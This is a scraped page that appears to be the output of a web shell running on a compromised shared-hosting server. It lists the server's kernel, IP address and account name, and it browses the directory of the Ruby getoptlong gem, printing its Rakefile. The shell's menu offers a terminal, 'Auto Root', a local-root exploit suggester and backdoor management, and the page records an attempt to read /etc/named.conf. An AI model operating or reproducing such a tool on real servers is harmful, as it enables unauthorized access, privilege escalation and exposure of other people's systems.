Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
gems /
gems /
getoptlong-0.2.1 /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2025-06-26 09:03
lib
[ DIR ]
drwxr-xr-x
2025-06-26 09:03
sample
[ DIR ]
drwxr-xr-x
2025-05-29 13:39
Gemfile
58
B
-rw-r--r--
2025-05-29 13:39
LICENSE.txt
1.25
KB
-rw-r--r--
2025-05-29 13:39
README.md
2.21
KB
-rw-r--r--
2025-05-29 13:39
Rakefile
195
B
-rw-r--r--
2025-05-29 13:39
Save
Rename
require 'bundler/gem_tasks' require 'rake/testtask' Rake::TestTask.new(:test) do |t| t.libs << 'test' t.libs << 'lib' t.test_files = FileList['test/test_*.rb'] end task :default => :test